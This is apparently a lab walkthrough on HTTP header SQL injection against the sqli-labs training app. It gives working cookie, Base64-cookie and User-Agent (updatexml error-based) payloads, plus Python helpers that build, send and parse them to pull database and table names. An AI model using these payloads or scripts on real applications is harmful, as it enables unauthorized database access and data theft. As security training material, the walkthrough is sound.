HTTP header injection
Cookie injection
Taking sqli-labs Less-20 as an example, use cookie injection to extract database information.
1. Send to repeater
Log in first with the username Dumb and the password Dumb.
After logging in, refresh the page, capture the request in Burp and send it to Repeater.
Work out the injection type in Repeater. After a few tries it turns out to be a string (character) injection closed with a single quote. If you are not sure how to identify the injection type, see my article: MySQL injection type identification and principle analysis (with a demonstration of the SQL statements executed)
2. Determine the number of columns
Once the injection type is known and the page echoes query results, union-based injection can be used; see my article: MySQL union injection
Set the Cookie header to:
Cookie: uname=Dumb' and 1=2 union select 1,2,3#
The three-column union succeeds and the values 2 and 3 appear on the page, so the query has 3 columns and the echo positions are columns 2 and 3. The payload travels in a header rather than in the URL, so the trailing # can be sent as-is and does not need to be URL-encoded as %23.
3. Extract database information
Cookie: uname=Dumb' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata#
Tables, columns and row data are extracted in the same way; for the details see my article: MySQL union injection
base64 injection
Taking sqli-labs Less-22 as an example, use base64 injection to extract database information.
Send to Repeater
Log in first with the username Dumb and the password Dumb.
After logging in, refresh the page, capture the request in Burp and send it to Repeater.
Encoding and decoding process
The value of the cookie is URL-encoded, so it first has to be URL-decoded in Burp's Decoder module. The result is Base64, which has to be decoded once more to reveal the plain value (the username). The URL-encoding comes from PHP's setcookie(), which escapes the = padding of the Base64 string as %3D; on the way back the server URL-decodes the cookie and then base64-decodes it. Injection is therefore tested against the plain value: write the payload in clear text, base64-encode it, and put the encoded string into the cookie.
sql injection
1. Determine the injection type
Base64-encode each of the following test strings in turn, send it as the cookie value and compare the page echo:
Dumb and 1=1#
Dumb and 1=2#
Dumb' and 1=1#
Dumb' and 1=2#
Dumb" and 1=1#
Dumb" and 1=2#
The results show that the injection is a string injection closed with a double quote. If you are not sure how to identify the injection type, see my article: MySQL injection type identification and principle analysis (with a demonstration of the SQL statements executed)
2. Determine the number of columns
Once the injection type is known and the page echoes query results, union-based injection can be used; see my article: MySQL union injection
Set the Cookie header to:
Cookie: uname=RHVtYiIgb3JkZXIgYnkgNCM=
This is the Base64 form of Dumb" order by 4#. It produces an error, so the query returns no more than 3 columns.
3. Determine the echo positions
Dumb" and 1=2 union select 1,2,3#
Base64-encode it and set the cookie to:
Cookie: uname=RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
The values 2 and 3 are echoed, so columns 2 and 3 are the echo positions.
4. Get the current database name through union injection
Dumb" and 1=2 union select 1,2,database()#
Base64-encode it and set the cookie to:
Cookie: uname=RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
The current database name is returned on the page.
So base64 injection is really the same as ordinary injection with one extra encoding and decoding step: decode what the server sends to see the plain value, and encode the payload before sending it back.
For the standard injection steps see my article: MySQL union injection
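The two cookie-based levels above (Less-20 and Less-22) differ only in the encoding layers wrapped around the payload. The following Python helper is an added example, not code from the original article or from sqli-labs: it applies those layers (none for Less-20; Base64 plus the URL-encoding PHP's setcookie() emits for Less-22), undoes them the way the server does, and renders the SQL each level will execute so the closing quote and the trailing comment can be checked before the request is sent. BASE_URL is an assumption for a local lab; the query templates follow the lab's PHP source, so verify them against your copy.

```python
import base64
import urllib.parse
import urllib.request

# Assumption: local sqli-labs install; adjust to your lab.
BASE_URL = "http://127.0.0.1/sqli-labs"

# How each level turns the uname cookie into SQL, following the lab's PHP source:
# Less-20 quotes the raw value with ', Less-22 base64-decodes it and quotes with ".
QUERY_TEMPLATES = {
    20: "SELECT * FROM users WHERE username='{value}' LIMIT 0,1",
    22: 'SELECT * FROM users WHERE username="{value}" LIMIT 0,1',
}


def encode_cookie_value(payload: str, level: int) -> str:
    """Wrap the clear-text payload in the layers the level expects.

    Less-20 reads the cookie as-is. Less-22 expects Base64; PHP's setcookie()
    URL-encodes the value it issues, which is why the = padding shows up as %3D
    in Burp, and the same form is reproduced here.
    """
    if level == 20:
        return payload
    if level == 22:
        b64 = base64.b64encode(payload.encode()).decode()
        return urllib.parse.quote(b64, safe="")
    raise ValueError(f"unsupported level {level}")


def server_side_value(cookie_value: str, level: int) -> str:
    """Mirror the server: $_COOKIE is URL-decoded, then Less-22 base64-decodes it."""
    value = urllib.parse.unquote(cookie_value)
    if level == 22:
        value = base64.b64decode(value).decode()
    return value


def render_query(payload: str, level: int) -> str:
    """The SQL the level will run for this payload, after a full encode/decode round
    trip, so the closing quote and trailing # can be eyeballed before sending."""
    seen_by_server = server_side_value(encode_cookie_value(payload, level), level)
    return QUERY_TEMPLATES[level].format(value=seen_by_server)


def build_cookie_header(payload: str, level: int) -> str:
    """Value of the Cookie header to paste into Repeater."""
    return "uname=" + encode_cookie_value(payload, level)


def send(payload: str, level: int, timeout: float = 10.0) -> str:
    """Replay the request Repeater sends: GET the level page with the crafted cookie."""
    url = f"{BASE_URL}/Less-{level}/index.php"
    req = urllib.request.Request(url, headers={"Cookie": build_cookie_header(payload, level)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# The Less-22 payloads from the article: column count, echo positions, current database.
LESS22_PAYLOADS = [
    'Dumb" order by 4#',
    'Dumb" and 1=2 union select 1,2,3#',
    'Dumb" and 1=2 union select 1,2,database()#',
]

if __name__ == "__main__":
    print(build_cookie_header("Dumb' and 1=2 union select 1,2,3#", 20))
    print("   ->", render_query("Dumb' and 1=2 union select 1,2,3#", 20))
    for payload in LESS22_PAYLOADS:
        print(build_cookie_header(payload, 22))
        print("   ->", render_query(payload, 22))
```

Running the script offline prints the header value and the resulting SQL for each payload; the Base64 strings it produces for the Less-22 payloads match the ones used above, and send() only needs to be called once the rendered query looks right.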
User-Agent injection
Taking sqli-labs Less-18 as an example, use User-Agent injection to extract database information.
Note: this level works like ordinary error-based injection, with two differences: the request has to be captured because the injection point is the User-Agent header, and a trailing # or --+ comment does not work. In Less-18 the header value is written into an INSERT ... VALUES ('...', '...', ...) statement, so commenting out the rest of the line leaves the VALUES list unclosed and MySQL rejects the statement with a syntax error before updatexml() ever runs. The payload therefore has to close the right-hand quote of the original statement itself, keeping it syntactically valid, and then call updatexml() to make MySQL raise an error that carries the data out, which is what error-based injection relies on.
Enter the username and password and click Submit (in this level the User-Agent is only recorded after a successful login, so use valid credentials such as Dumb/Dumb), then capture the request with Burp and send it to Repeater.
Testing the User-Agent shows that the response changes with its value. With a single quote added there is no data echo but a database error is displayed, which indicates a string injection closed with a single quote, so error-based injection is the right tool. Change the UA header to:
User-Agent: yuanboss' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1' = '1
The database name appears in the error message.
Note that a # or --+ comment after the payload is invalid here, so the right-hand side has to be closed instead: ending the payload with and '1'='1 supplies the quote the original statement expects and achieves the same goal.
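To make the point about the comment concrete, here is an added Python example (not from the article or from sqli-labs) for the Less-18 flow: it builds the updatexml() User-Agent payload for an arbitrary expression, renders the INSERT statement the level executes, checks whether quotes and parentheses are still balanced at the point where a # or -- comment would cut the statement off, parses the leaked value out of MySQL's XPATH syntax error text, and splits long results into substring() windows because that error text carries at most 32 characters. The lab URL, the form field names, 127.0.0.1 as the recorded client address and the sample error line are assumptions or constructed input.

```python
import re
import urllib.parse
import urllib.request

# Assumption: local sqli-labs install; adjust to your lab.
LESS18_URL = "http://127.0.0.1/sqli-labs/Less-18/index.php"

# The statement Less-18 builds from the request after a successful login (from the
# lab's PHP source; the username is already quoted by the lab's check_input()).
INSERT_TEMPLATE = (
    "INSERT INTO security.uagents (uagent, ip_address, username) "
    "VALUES ('{ua}', '{ip}', '{uname}')"
)

# MySQL shows at most 32 characters of the bad XPath expression in the error text;
# the leading ~ marker takes one of them, leaving 31 characters of data per request.
XPATH_CHUNK = 31


def build_ua_payload(expr: str) -> str:
    """The article's updatexml() payload generalised to any SQL expression. It closes
    the open quote with and '1'='1 so the surrounding INSERT stays syntactically valid."""
    return f"yuanboss' and updatexml(1,concat(0x7e,({expr}),0x7e),1) and '1'='1"


def chunked_exprs(expr: str, total_len: int, width: int = XPATH_CHUNK):
    """Yield substring() expressions that walk a result longer than one error message."""
    for start in range(1, total_len + 1, width):
        yield f"substring(({expr}),{start},{width})"


def render_insert(ua: str, ip: str = "127.0.0.1", uname: str = "Dumb") -> str:
    """The SQL Less-18 executes for a given User-Agent value (ip and uname assumed)."""
    return INSERT_TEMPLATE.format(ua=ua, ip=ip, uname=uname)


def is_syntactically_closed(sql: str) -> bool:
    """Walk the statement tracking single-quoted strings, stop at a # or '-- ' comment
    outside a string, and report whether quotes and parentheses are balanced there.
    A raw header is not URL-decoded, so '--+' stays '--+' and is not a comment; only
    # and '-- ' are treated as one. A False result means MySQL rejects the statement
    before updatexml() runs, which is why the comment-terminated payload leaks nothing."""
    depth = 0
    in_str = False
    i = 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "'":
                if sql[i + 1:i + 2] == "'":   # '' is an escaped quote inside a string
                    i += 1
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif c == "#" or sql.startswith("-- ", i):
            break
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        i += 1
    return not in_str and depth == 0


def parse_xpath_error(body: str):
    """Extract the leaked text from `XPATH syntax error: '~security~'`. The closing ~
    is absent when the leaked chunk used up the 32-character limit."""
    m = re.search(r"XPATH syntax error: '~([^'~]*)~?'", body)
    return m.group(1) if m else None


def send_ua(ua: str, uname: str = "Dumb", passwd: str = "Dumb", timeout: float = 10.0) -> str:
    """POST the login form with the crafted User-Agent, as Burp Repeater would (field names assumed)."""
    data = urllib.parse.urlencode({"uname": uname, "passwd": passwd, "submit": "Submit"}).encode()
    req = urllib.request.Request(LESS18_URL, data=data, headers={"User-Agent": ua})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Constructed sample of the error line the page shows for the database() payload.
    sample_body = "XPATH syntax error: '~security~'"
    print(parse_xpath_error(sample_body))
    bad = render_insert("yuanboss' and updatexml(1,concat(0x7e,database(),0x7e),1)#")
    good = render_insert(build_ua_payload("database()"))
    print(is_syntactically_closed(bad), is_syntactically_closed(good))
    tables = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    for e in chunked_exprs(tables, 70):
        print(build_ua_payload(e))
```

Rendering the INSERT for the #-terminated payload shows the VALUES list left open (one unmatched parenthesis), while the and '1'='1 form balances; the chunked payloads are what to send once a group_concat() result no longer fits in a single error message.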